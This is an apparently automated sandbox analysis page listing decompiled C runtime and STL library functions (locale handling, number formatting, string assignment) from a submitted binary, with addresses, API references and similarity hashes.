0x0043e7fa
0x0043e808
0x0043e80b
0x0043e810
0x0043e817
0x00000000
0x0043e819
0x0043e819
0x00000000
0x0043e819
0x0043e7ec
0x0043e7ec
0x0043e81d
0x0043e81f
0x0043e822
0x00000000
0x0043e822

APIs

_Maklocchr.LIBCPMT ref: 0043E7A7
_Maklocchr.LIBCPMT ref: 0043E7DE
_Maklocchr.LIBCPMT ref: 0043E80B
__Stolx.LIBCPMT ref: 0043E900

Strings

-, xrefs: 0043E819

Memory Dump Source

Source File: 00000000.00000002.289784623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.289780882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289895062.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289910874.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289915647.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_555.jbxd

Similarity

API ID: Maklocchr$Stolx
String ID: -
API String ID: 62107157-2547889144
Opcode ID: f716448e8dc6360bdcec48dc3f7be994c40cd5801a79bda7db3a9c384b813abf
Instruction ID: e61eec82e4e2eba52af593f13dc0540f39f474fe642994fb8dc65be346940f0f
Opcode Fuzzy Hash: f716448e8dc6360bdcec48dc3f7be994c40cd5801a79bda7db3a9c384b813abf
Instruction Fuzzy Hash: 4851C160D022489ADF24EBA6C4817EEBBF59F4D708F04605FE841772C2D7789E45C76A

Uniqueness

Uniqueness Score: -1.00%

Function 004027B0 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 109
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 86%

			E004027B0(intOrPtr __ecx, char _a8) {
				intOrPtr _v8;
				char _v16;
				intOrPtr _v20;
				intOrPtr* _v24;
				intOrPtr _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t25;
				intOrPtr* _t28;
				intOrPtr* _t30;
				char* _t32;
				char* _t34;
				char* _t36;
				char _t40;
				intOrPtr _t43;
				intOrPtr _t47;
				char* _t48;
				char* _t49;
				char* _t50;
				void* _t57;
				intOrPtr* _t58;
				char _t59;
				char _t60;
				void* _t62;
				void* _t63;
				intOrPtr* _t64;
				intOrPtr* _t65;
				intOrPtr* _t66;
				signed int _t68;
				void* _t69;
				void* _t74;

				_push(0xffffffff);
				_push(E0044D9D0);
				_push( *[fs:0x0]);
				_push(_t62);
				_push(_t57);
				_t25 =  *0x4608e0; // 0xb51ec2b3
				_push(_t25 ^ _t68);
				 *[fs:0x0] =  &_v16;
				_v20 = _t69 - 0xc;
				_t43 = __ecx;
				_v28 = __ecx;
				_t28 = E004230FE(__ecx, _t57, _t62, _t74);
				_v24 = _t28;
				 *((intOrPtr*)(_t43 + 8)) = 0;
				 *((intOrPtr*)(_t43 + 0x10)) = 0;
				 *((intOrPtr*)(_t43 + 0x14)) = 0;
				_v8 = 0;
				_t58 = 0x4515f5;
				if(_a8 == 0) {
					_t58 =  *((intOrPtr*)(_t28 + 8));
				}
				E0040D8E0();
				_t30 = _t58;
				_t11 = _t30 + 1; // 0x4515f6
				_t54 = _t11;
				do {
					_t47 =  *_t30;
					_t30 = _t30 + 1;
				} while (_t47 != 0);
				_t12 = _t30 - _t54 + 1; // 0x4515f7
				_t63 = _t12;
				_push(_t63);
				_t32 = E0040E131(_t54, _t58, _t63, _t30 - _t54);
				_t48 = _t32;
				while(_t63 != 0) {
					_t54 =  *_t58;
					 *_t48 =  *_t58;
					_t63 = _t63 - 1;
					_t48 = _t48 + 1;
					_t58 = _t58 + 1;
				}
				 *((intOrPtr*)(_t43 + 8)) = _t32;
				E0040D8E0();
				_t59 = 6;
				_push(6);
				_t64 = 0x4515e8;
				_t34 = E0040E131(_t54, 6, 0x4515e8, __eflags);
				_t49 = _t34;
				while(1) {
					__eflags = _t59;
					if(__eflags == 0) {
						break;
					}
					_t54 =  *_t64;
					 *_t49 =  *_t64;
					_t59 = _t59 - 1;
					_t49 = _t49 + 1;
					_t64 = _t64 + 1;
				}
				 *((intOrPtr*)(_t43 + 0x10)) = _t34;
				E0040D8E0();
				_t60 = 5;
				_push(5);
				_t65 = 0x4515f0;
				_t36 = E0040E131(_t54, 5, 0x4515f0, __eflags);
				_t50 = _t36;
				while(1) {
					__eflags = _t60;
					if(_t60 == 0) {
						break;
					}
					 *_t50 =  *_t65;
					_t60 = _t60 - 1;
					_t50 = _t50 + 1;
					_t65 = _t65 + 1;
				}
				 *((intOrPtr*)(_t43 + 0x14)) = _t36;
				E0040D8E0();
				_t66 = _v24;
				 *((char*)(_t43 + 0xc)) =  *((intOrPtr*)( *_t66));
				E0040D8E0();
				__eflags = _a8;
				_t40 =  *((intOrPtr*)( *((intOrPtr*)(_t66 + 4))));
				 *((char*)(_t43 + 0xd)) = _t40;
				if(_a8 != 0) {
					E0040D8E0();
					 *((char*)(_t43 + 0xc)) = 0x2e;
					_t40 = E0040D8E0();
					 *((char*)(_t43 + 0xd)) = 0x2c;
				}
				 *[fs:0x0] = _v16;
				return _t40;
			}

0x004027b3
0x004027b5
0x004027c0
0x004027c5
0x004027c6
0x004027c7
0x004027ce
0x004027d2
0x004027d8
0x004027db
0x004027dd
0x004027e0
0x004027e7
0x004027ea
0x004027ed
0x004027f0
0x004027f3
0x004027f6
0x004027fe
0x00402800
0x00402800
0x00402803
0x00402808
0x0040280a
0x0040280a
0x00402810
0x00402810
0x00402812
0x00402813
0x00402819
0x00402819
0x0040281c
0x0040281d
0x00402825
0x00402827
0x0040282b
0x0040282d
0x0040282f
0x00402830
0x00402831
0x00402831
0x00402834
0x00402837
0x0040283c
0x00402841
0x00402842
0x00402847
0x0040284f
0x00402851
0x00402851
0x00402853
0x00000000
0x00000000
0x00402855
0x00402857
0x00402859
0x0040285a
0x0040285b
0x0040285b
0x0040285e
0x00402861
0x00402866
0x0040286b
0x0040286c
0x00402871
0x00402879
0x00402880
0x00402880
0x00402882
0x00000000
0x00000000
0x00402886
0x00402888
0x00402889
0x0040288a
0x0040288a
0x0040288d
0x00402890
0x00402895
0x0040289c
0x0040289f
0x004028a4
0x004028ab
0x004028ad
0x004028b0
0x004028b2
0x004028b7
0x004028bb
0x004028c0
0x004028c0
0x004028c7
0x004028d5

APIs

_localeconv.LIBCMT ref: 004027E0

Part of subcall function 004230FE: __getptd.LIBCMT ref: 004230FE

Strings

,, xrefs: 004028C0
false, xrefs: 00402842
true, xrefs: 0040286C
., xrefs: 004028B7

Memory Dump Source

Source File: 00000000.00000002.289784623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.289780882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289895062.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289910874.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289915647.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_555.jbxd

Similarity

API ID: __getptd_localeconv
String ID: ,$.$false$true
API String ID: 1421026308-4283260876
Opcode ID: a64e5113404e9fad6721f5d50a73d84ee82a6d2e09f9a9837da463bca8ee00d8
Instruction ID: 48aa465cc05a8b1d5d8178eb039ab18d18a0b796632bd3252646b784ee769c1a
Opcode Fuzzy Hash: a64e5113404e9fad6721f5d50a73d84ee82a6d2e09f9a9837da463bca8ee00d8
Instruction Fuzzy Hash: E9314976D082809BC705BF79944421BBBA09F45344F18C5BFD8956F3C2D6B9C909CBE5

Uniqueness

Uniqueness Score: -1.00%

Function 004472EC Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 104
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E004472EC(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed char _t46;
				int _t49;
				signed short _t62;
				void* _t72;
				void* _t74;
				void* _t76;
				void* _t77;
				signed long long* _t78;
				signed long long* _t79;
				signed long long _t88;

				_t72 = __edx;
				_t67 = __ecx;
				_push(0x5c);
				E00425719(E0044FD5C, __ebx, __edi, __esi);
				asm("fldz");
				 *((intOrPtr*)(_t77 - 0x60)) =  *((intOrPtr*)(_t77 + 8));
				_t46 =  *(_t77 + 0x18);
				asm("fcom st0, st1");
				 *(_t77 - 0x68) = _t46;
				_t74 = __ecx;
				 *((char*)(_t77 - 0x64)) = 0;
				asm("fnstsw ax");
				st1 =  *((long long*)(_t77 + 0x20));
				if((_t46 & 0x00000005) == 0) {
					 *((char*)(_t77 - 0x64)) = 1;
					asm("fchs");
				}
				_t88 =  *0x451730;
				 *((intOrPtr*)(_t77 - 0x58)) = 0;
				asm("fcom st0, st1");
				asm("fnstsw ax");
				if((_t46 & 0x00000041) != 0) {
					while(1) {
						__eflags =  *((intOrPtr*)(_t77 - 0x58)) - 0x1388;
						if( *((intOrPtr*)(_t77 - 0x58)) >= 0x1388) {
							goto L3;
						}
						asm("fxch st0, st1");
						 *((intOrPtr*)(_t77 - 0x58)) =  *((intOrPtr*)(_t77 - 0x58)) + 0xa;
						_t88 = _t88 /  *0x451728;
						asm("fcom st0, st1");
						asm("fnstsw ax");
						__eflags = _t46 & 0x00000001;
						if((_t46 & 0x00000001) == 0) {
							asm("fxch st0, st1");
							continue;
						} else {
							st1 = _t88;
						}
						goto L8;
					}
					goto L3;
				} else {
					L3:
					st0 = _t88;
				}
				L8:
				 *((intOrPtr*)(_t77 - 0x40)) = 7;
				 *((intOrPtr*)(_t77 - 0x44)) = 0;
				 *((short*)(_t77 - 0x54)) = 0;
				 *_t78 = _t88;
				 *((intOrPtr*)(_t77 - 4)) = 0;
				_t49 = swprintf(_t77 - 0x38, 0x28, "%.0Lf", _t67, _t67);
				_t79 =  &(_t78[2]);
				_t76 = 0;
				 *(_t77 - 0x5c) = _t49;
				if(_t49 > 0) {
					do {
						_t62 = E0043B943(_t67,  *(_t77 + _t76 - 0x38) & 0x000000ff, 0, _t74 + 8);
						_t79 =  &(_t79[1]);
						_t67 = _t77 - 0x54;
						E0041AA60(_t77 - 0x54, 1, _t62 & 0x0000ffff);
						_t76 = _t76 + 1;
						_t86 = _t76 -  *(_t77 - 0x5c);
					} while (_t76 <  *(_t77 - 0x5c));
				}
				E0041AA60(_t77 - 0x54,  *((intOrPtr*)(_t77 - 0x58)), E0043B943(_t67, 0x30, 0, _t74 + 8) & 0x0000ffff);
				_t81 =  &(_t79[1]) - 0x1c;
				 *(_t77 - 0x5c) =  &(_t79[1]) - 0x1c;
				E00419900(_t81, _t77 - 0x54);
				_push( *((intOrPtr*)(_t77 - 0x64)));
				_push( *((intOrPtr*)(_t77 + 0x1c)));
				_push( *(_t77 - 0x68));
				_push( *((intOrPtr*)(_t77 + 0x14)));
				_push( *((intOrPtr*)(_t77 + 0x10)));
				_push( *((intOrPtr*)(_t77 + 0xc)));
				_push( *((intOrPtr*)(_t77 - 0x60)));
				E00445DBF(0, _t74, _t72, _t74, _t76, _t86);
				E00418D50(_t77 - 0x54, 1, 0);
				return E00425763(0, _t74, _t76);
			}

0x004472ec
0x004472ec
0x004472ec
0x004472f3
0x004472f8
0x00447300
0x00447303
0x00447306
0x00447308
0x0044730d
0x0044730f
0x00447312
0x00447314
0x00447319
0x0044731b
0x0044731f
0x0044731f
0x00447321
0x00447327
0x0044732a
0x0044732c
0x00447331
0x00447339
0x00447339
0x00447340
0x00000000
0x00000000
0x00447342
0x00447344
0x00447348
0x0044734e
0x00447350
0x00447352
0x00447355
0x00447337
0x00000000
0x00447357
0x00447357
0x00447357
0x00000000
0x00447355
0x00000000
0x00447333
0x00447333
0x00447333
0x00447333
0x00447359
0x0044735b
0x00447362
0x00447365
0x0044736b
0x00447379
0x0044737c
0x00447381
0x00447384
0x00447386
0x0044738b
0x0044738d
0x00447398
0x004473a0
0x004473a6
0x004473a9
0x004473ae
0x004473af
0x004473af
0x0044738d
0x004473cd
0x004473d2
0x004473da
0x004473de
0x004473e3
0x004473e8
0x004473eb
0x004473ee
0x004473f1
0x004473f4
0x004473f7
0x004473fa
0x00447405
0x00447412

APIs

__EH_prolog3_GS.LIBCMT ref: 004472F3
swprintf.LIBCMT ref: 0044737C
_Maklocchr.LIBCPMT ref: 00447398
_Maklocchr.LIBCPMT ref: 004473BB

Strings

%.0Lf, xrefs: 0044736E

Memory Dump Source

Source File: 00000000.00000002.289784623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.289780882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289895062.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289910874.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289915647.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_555.jbxd

Similarity

API ID: Maklocchr$H_prolog3_swprintf
String ID: %.0Lf
API String ID: 1639027223-1402515088
Opcode ID: df6d071295dda3c9e133aa54c342c859e805714b1ff20d859ca3a4f1904060a4
Instruction ID: 141cbb4080886b298b45144a86e70e69a64427f9e1968f68609d3cb0e0ec10aa
Opcode Fuzzy Hash: df6d071295dda3c9e133aa54c342c859e805714b1ff20d859ca3a4f1904060a4
Instruction Fuzzy Hash: 4231E0B1D00348AADF01EFD4C941BDEBBB8FF08304F10401AF945A7291D7399A59CB95

Uniqueness

Uniqueness Score: -1.00%

Function 00447C78 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 104
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E00447C78(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed char _t46;
				int _t49;
				signed short _t62;
				void* _t72;
				void* _t74;
				void* _t76;
				void* _t77;
				signed long long* _t78;
				signed long long* _t79;
				signed long long _t88;

				_t72 = __edx;
				_t67 = __ecx;
				_push(0x5c);
				E00425719(E0044FEA5, __ebx, __edi, __esi);
				asm("fldz");
				 *((intOrPtr*)(_t77 - 0x60)) =  *((intOrPtr*)(_t77 + 8));
				_t46 =  *(_t77 + 0x18);
				asm("fcom st0, st1");
				 *(_t77 - 0x68) = _t46;
				_t74 = __ecx;
				 *((char*)(_t77 - 0x64)) = 0;
				asm("fnstsw ax");
				st1 =  *((long long*)(_t77 + 0x20));
				if((_t46 & 0x00000005) == 0) {
					 *((char*)(_t77 - 0x64)) = 1;
					asm("fchs");
				}
				_t88 =  *0x451730;
				 *((intOrPtr*)(_t77 - 0x58)) = 0;
				asm("fcom st0, st1");
				asm("fnstsw ax");
				if((_t46 & 0x00000041) != 0) {
					while(1) {
						__eflags =  *((intOrPtr*)(_t77 - 0x58)) - 0x1388;
						if( *((intOrPtr*)(_t77 - 0x58)) >= 0x1388) {
							goto L3;
						}
						asm("fxch st0, st1");
						 *((intOrPtr*)(_t77 - 0x58)) =  *((intOrPtr*)(_t77 - 0x58)) + 0xa;
						_t88 = _t88 /  *0x451728;
						asm("fcom st0, st1");
						asm("fnstsw ax");
						__eflags = _t46 & 0x00000001;
						if((_t46 & 0x00000001) == 0) {
							asm("fxch st0, st1");
							continue;
						} else {
							st1 = _t88;
						}
						goto L8;
					}
					goto L3;
				} else {
					L3:
					st0 = _t88;
				}
				L8:
				 *((intOrPtr*)(_t77 - 0x40)) = 7;
				 *((intOrPtr*)(_t77 - 0x44)) = 0;
				 *((short*)(_t77 - 0x54)) = 0;
				 *_t78 = _t88;
				 *((intOrPtr*)(_t77 - 4)) = 0;
				_t49 = swprintf(_t77 - 0x38, 0x28, "%.0Lf", _t67, _t67);
				_t79 =  &(_t78[2]);
				_t76 = 0;
				 *(_t77 - 0x5c) = _t49;
				if(_t49 > 0) {
					do {
						_t62 = E0043B943(_t67,  *(_t77 + _t76 - 0x38) & 0x000000ff, 0, _t74 + 8);
						_t79 =  &(_t79[1]);
						_t67 = _t77 - 0x54;
						E0043F839(_t77 - 0x54, _t72, 1, _t62 & 0x0000ffff);
						_t76 = _t76 + 1;
						_t86 = _t76 -  *(_t77 - 0x5c);
					} while (_t76 <  *(_t77 - 0x5c));
				}
				E0043F839(_t77 - 0x54, _t72,  *((intOrPtr*)(_t77 - 0x58)), E0043B943(_t67, 0x30, 0, _t74 + 8) & 0x0000ffff);
				_t81 =  &(_t79[1]) - 0x1c;
				 *(_t77 - 0x5c) =  &(_t79[1]) - 0x1c;
				E004436BB(_t81, _t77 - 0x54);
				_push( *((intOrPtr*)(_t77 - 0x64)));
				_push( *((intOrPtr*)(_t77 + 0x1c)));
				_push( *(_t77 - 0x68));
				_push( *((intOrPtr*)(_t77 + 0x14)));
				_push( *((intOrPtr*)(_t77 + 0x10)));
				_push( *((intOrPtr*)(_t77 + 0xc)));
				_push( *((intOrPtr*)(_t77 - 0x60)));
				E00447649(0, _t74, _t72, _t74, _t76, _t86);
				E0043C7F3(_t77 - 0x54, 1, 0);
				return E00425763(0, _t74, _t76);
			}

0x00447c78
0x00447c78
0x00447c78
0x00447c7f
0x00447c84
0x00447c8c
0x00447c8f
0x00447c92
0x00447c94
0x00447c99
0x00447c9b
0x00447c9e
0x00447ca0
0x00447ca5
0x00447ca7
0x00447cab
0x00447cab
0x00447cad
0x00447cb3
0x00447cb6
0x00447cb8
0x00447cbd
0x00447cc5
0x00447cc5
0x00447ccc
0x00000000
0x00000000
0x00447cce
0x00447cd0
0x00447cd4
0x00447cda
0x00447cdc
0x00447cde
0x00447ce1
0x00447cc3
0x00000000
0x00447ce3
0x00447ce3
0x00447ce3
0x00000000
0x00447ce1
0x00000000
0x00447cbf
0x00447cbf
0x00447cbf
0x00447cbf
0x00447ce5
0x00447ce7
0x00447cee
0x00447cf1
0x00447cf7
0x00447d05
0x00447d08
0x00447d0d
0x00447d10
0x00447d12
0x00447d17
0x00447d19
0x00447d24
0x00447d2c
0x00447d32
0x00447d35
0x00447d3a
0x00447d3b
0x00447d3b
0x00447d19
0x00447d59
0x00447d5e
0x00447d66
0x00447d6a
0x00447d6f
0x00447d74
0x00447d77
0x00447d7a
0x00447d7d
0x00447d80
0x00447d83
0x00447d86
0x00447d91
0x00447d9e

APIs

__EH_prolog3_GS.LIBCMT ref: 00447C7F
swprintf.LIBCMT ref: 00447D08
_Maklocchr.LIBCPMT ref: 00447D24
_Maklocchr.LIBCPMT ref: 00447D47

Strings

%.0Lf, xrefs: 00447CFA

Memory Dump Source

Source File: 00000000.00000002.289784623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.289780882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289895062.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289910874.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289915647.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_555.jbxd

Similarity

API ID: Maklocchr$H_prolog3_swprintf
String ID: %.0Lf
API String ID: 1639027223-1402515088
Opcode ID: 6b1fde2539bfcd916391bdfa7f7ae01136db88764bb866a3e755116b7fea6df5
Instruction ID: 21b5be76128f7c55d97d11b91c10a5c73a120d7e34f9785c03750def53bc692a
Opcode Fuzzy Hash: 6b1fde2539bfcd916391bdfa7f7ae01136db88764bb866a3e755116b7fea6df5
Instruction Fuzzy Hash: 2531BFB1D00349AADF01EFE4C885BDD7BB8FF08300F20442AF944AB255D7799A5ACB95

Uniqueness

Uniqueness Score: -1.00%

Function 00403BC0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 102
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00403BC0(intOrPtr* __ecx) {
				intOrPtr _t14;
				intOrPtr _t15;
				intOrPtr* _t17;
				char* _t23;
				intOrPtr _t33;
				intOrPtr* _t35;
				intOrPtr _t38;
				intOrPtr _t39;
				intOrPtr* _t41;
				intOrPtr* _t42;
				void* _t43;

				_t34 = __ecx;
				_t33 =  *((intOrPtr*)(_t43 + 0xc));
				_t42 =  *((intOrPtr*)(_t43 + 0xc));
				_t38 =  *((intOrPtr*)(_t42 + 0x10));
				_t41 = __ecx;
				if(_t38 < _t33) {
					E0040DF6E("invalid string position");
				}
				_t14 =  *((intOrPtr*)(_t43 + 0x1c));
				_t39 = _t38 - _t33;
				if(_t14 < _t39) {
					_t39 = _t14;
				}
				if(_t41 != _t42) {
					if(_t39 > 0xfffffffe) {
						E0040DF21("string too long");
					}
					_t15 =  *((intOrPtr*)(_t41 + 0x14));
					if(_t15 >= _t39) {
						if(_t39 != 0) {
							goto L10;
						} else {
							 *((intOrPtr*)(_t41 + 0x10)) = _t39;
							if(_t15 < 0x10) {
								_t23 = _t41;
								 *_t23 = 0;
								return _t23;
							} else {
								 *((char*)( *_t41)) = 0;
								return _t41;
							}
						}
					} else {
						E00402F60(_t34, _t39,  *((intOrPtr*)(_t41 + 0x10)));
						if(_t39 == 0) {
							L23:
							return _t41;
						} else {
							L10:
							if( *((intOrPtr*)(_t42 + 0x14)) < 0x10) {
								_t35 = _t42;
							} else {
								_t35 =  *_t42;
							}
							if( *((intOrPtr*)(_t41 + 0x14)) < 0x10) {
								_t17 = _t41;
							} else {
								_t17 =  *_t41;
							}
							E004224A0(_t17, _t35 + _t33, _t39);
							 *((intOrPtr*)(_t41 + 0x10)) = _t39;
							if( *((intOrPtr*)(_t41 + 0x14)) < 0x10) {
								 *((char*)(_t41 + _t39)) = 0;
								goto L23;
							} else {
								 *((char*)( *_t41 + _t39)) = 0;
								return _t41;
							}
						}
					}
				} else {
					E00402DA0(_t34, _t39 + _t33, 0xffffffff);
					E00402DA0(_t41, 0, _t33);
					return _t41;
				}
			}

0x00403bc0
0x00403bc1
0x00403bc6
0x00403bcc
0x00403bcf
0x00403bd3
0x00403bda
0x00403bda
0x00403bdf
0x00403be3
0x00403be7
0x00403be9
0x00403be9
0x00403bed
0x00403c0f
0x00403c16
0x00403c16
0x00403c1b
0x00403c20
0x00403c41
0x00000000
0x00403c43
0x00403c43
0x00403c49
0x00403c5a
0x00403c5e
0x00403c62
0x00403c4b
0x00403c4e
0x00403c56
0x00403c56
0x00403c49
0x00403c22
0x00403c27
0x00403c2e
0x00403c9e
0x00403ca3
0x00403c30
0x00403c30
0x00403c38
0x00403c65
0x00403c3a
0x00403c3a
0x00403c3a
0x00403c6a
0x00403c70
0x00403c6c
0x00403c6c
0x00403c6c
0x00403c77
0x00403c83
0x00403c86
0x00403c99
0x00000000
0x00403c88
0x00403c8a
0x00403c94
0x00403c94
0x00403c86
0x00403c2e
0x00403bef
0x00403bf4
0x00403bfe
0x00403c09
0x00403c09

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00403BDA

Part of subcall function 0040DF6E: std::exception::exception.LIBCMT ref: 0040DF83
Part of subcall function 0040DF6E: __CxxThrowException@8.LIBCMT ref: 0040DF98
Part of subcall function 0040DF6E: std::exception::exception.LIBCMT ref: 0040DFA9

std::_Xinvalid_argument.LIBCPMT ref: 00403C16

Part of subcall function 0040DF21: std::exception::exception.LIBCMT ref: 0040DF36
Part of subcall function 0040DF21: __CxxThrowException@8.LIBCMT ref: 0040DF4B
Part of subcall function 0040DF21: std::exception::exception.LIBCMT ref: 0040DF5C

_memmove.LIBCMT ref: 00403C77

Strings

string too long, xrefs: 00403C11
invalid string position, xrefs: 00403BD5

Memory Dump Source

Source File: 00000000.00000002.289784623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.289780882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289895062.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289910874.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289915647.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_555.jbxd

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_$_memmove
String ID: invalid string position$string too long
API String ID: 1615890066-4289949731
Opcode ID: 08bc18afad75a0acc1f2ecd78013240c25e6cfc4610bb322e7df49aecdcc33e9
Instruction ID: 944f9626279926cd56ec7927daa4245ddba11c04a56170ec22fbfab3fb233060
Opcode Fuzzy Hash: 08bc18afad75a0acc1f2ecd78013240c25e6cfc4610bb322e7df49aecdcc33e9
Instruction Fuzzy Hash: 6321C5333042149BD7209E5CA984B2AFBADDBD2766F20493FF551EB2C1C7799D408369

Uniqueness

Uniqueness Score: -1.00%

Function 0043F8EE Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 72
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0043F8EE(signed int __ecx, signed int _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _t18;
				intOrPtr _t22;
				intOrPtr* _t23;
				signed int _t27;
				intOrPtr _t28;
				signed int _t29;
				intOrPtr* _t33;
				intOrPtr* _t37;
				intOrPtr* _t43;

				_t29 = __ecx;
				_t43 = __ecx;
				_t18 =  *((intOrPtr*)(__ecx + 0x10));
				_t42 = _a4;
				if(_t18 < _a4) {
					_t18 = E0040DF6E("invalid string position");
				}
				_t28 = _a8;
				if((_t29 | 0xffffffff) - _t18 <= _t28) {
					_t18 = E0040DF21("string too long");
				}
				_t48 = _t28;
				if(_t28 != 0) {
					_a4 = _t18 + _t28;
					if(E0041AC50(_t43, _t48, _t18 + _t28, 0) != 0) {
						_t22 =  *((intOrPtr*)(_t43 + 0x14));
						if(_t22 < 8) {
							_t33 = _t43;
						} else {
							_t33 =  *_t43;
						}
						if(_t22 < 8) {
							_t23 = _t43;
						} else {
							_t23 =  *_t43;
						}
						E00422810(_t23 + (_t42 + _t28) * 2, _t33 + _t42 * 2,  *(_t43 + 0x10) - _t42 +  *(_t43 + 0x10) - _t42);
						E0041B5F0(_t43, _t42, _t28, _a12);
						_t27 = _a4;
						 *(_t43 + 0x10) = _t27;
						if( *((intOrPtr*)(_t43 + 0x14)) < 8) {
							_t37 = _t43;
						} else {
							_t37 =  *_t43;
						}
						 *((short*)(_t37 + _t27 * 2)) = 0;
					}
				}
				return _t43;
			}

0x0043f8ee
0x0043f8f5
0x0043f8f7
0x0043f8fb
0x0043f900
0x0043f907
0x0043f907
0x0043f90c
0x0043f916
0x0043f91d
0x0043f91d
0x0043f922
0x0043f924
0x0043f92d
0x0043f937
0x0043f939
0x0043f93f
0x0043f945
0x0043f941
0x0043f941
0x0043f941
0x0043f94a
0x0043f950
0x0043f94c
0x0043f94c
0x0043f94c
0x0043f965
0x0043f974
0x0043f97d
0x0043f980
0x0043f983
0x0043f989
0x0043f985
0x0043f985
0x0043f985
0x0043f98d
0x0043f98d
0x0043f937
0x0043f997

APIs

std::_Xinvalid_argument.LIBCPMT ref: 0043F907

Part of subcall function 0040DF6E: std::exception::exception.LIBCMT ref: 0040DF83
Part of subcall function 0040DF6E: __CxxThrowException@8.LIBCMT ref: 0040DF98
Part of subcall function 0040DF6E: std::exception::exception.LIBCMT ref: 0040DFA9

std::_Xinvalid_argument.LIBCPMT ref: 0043F91D
_memmove.LIBCMT ref: 0043F965

Strings

string too long, xrefs: 0043F918
invalid string position, xrefs: 0043F902

Memory Dump Source

Source File: 00000000.00000002.289784623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.289780882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289895062.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289910874.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289915647.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_555.jbxd

Similarity

API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw_memmove
String ID: invalid string position$string too long
API String ID: 3404309857-4289949731
Opcode ID: 6e51270d1891fbccaf74075a7b9620ac993039dbb5551819e00fab2d2cf0f7ed
Instruction ID: 670dd8145229a3c829294f585d311a4641bcb20fed19613c63fc1006393ae4f2
Opcode Fuzzy Hash: 6e51270d1891fbccaf74075a7b9620ac993039dbb5551819e00fab2d2cf0f7ed
Instruction Fuzzy Hash: 7A11EB717002057BC724DE69CC90B6AB7AAEF89754B14453FF482C7641DB34AC498799

Uniqueness

Uniqueness Score: -1.00%

Function 0044091C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 72
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0044091C(signed int __ecx, void* __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12) {
				void* __ebx;
				void* __edi;
				intOrPtr _t18;
				intOrPtr _t22;
				intOrPtr* _t23;
				signed int _t27;
				intOrPtr _t28;
				signed int _t29;
				intOrPtr* _t33;
				intOrPtr* _t37;
				void* _t38;
				intOrPtr* _t44;

				_t38 = __edx;
				_t29 = __ecx;
				_t44 = __ecx;
				_t18 =  *((intOrPtr*)(__ecx + 0x10));
				_t43 = _a4;
				if(_t18 < _a4) {
					_t18 = E0040DF6E("invalid string position");
				}
				_t28 = _a8;
				if((_t29 | 0xffffffff) - _t18 <= _t28) {
